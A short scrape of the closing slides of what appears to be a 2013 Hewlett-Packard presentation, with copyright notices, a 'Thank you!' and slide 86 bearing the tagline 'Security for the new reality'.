© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Thank you!

Slide 86

Slide 86 text

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Security for the new reality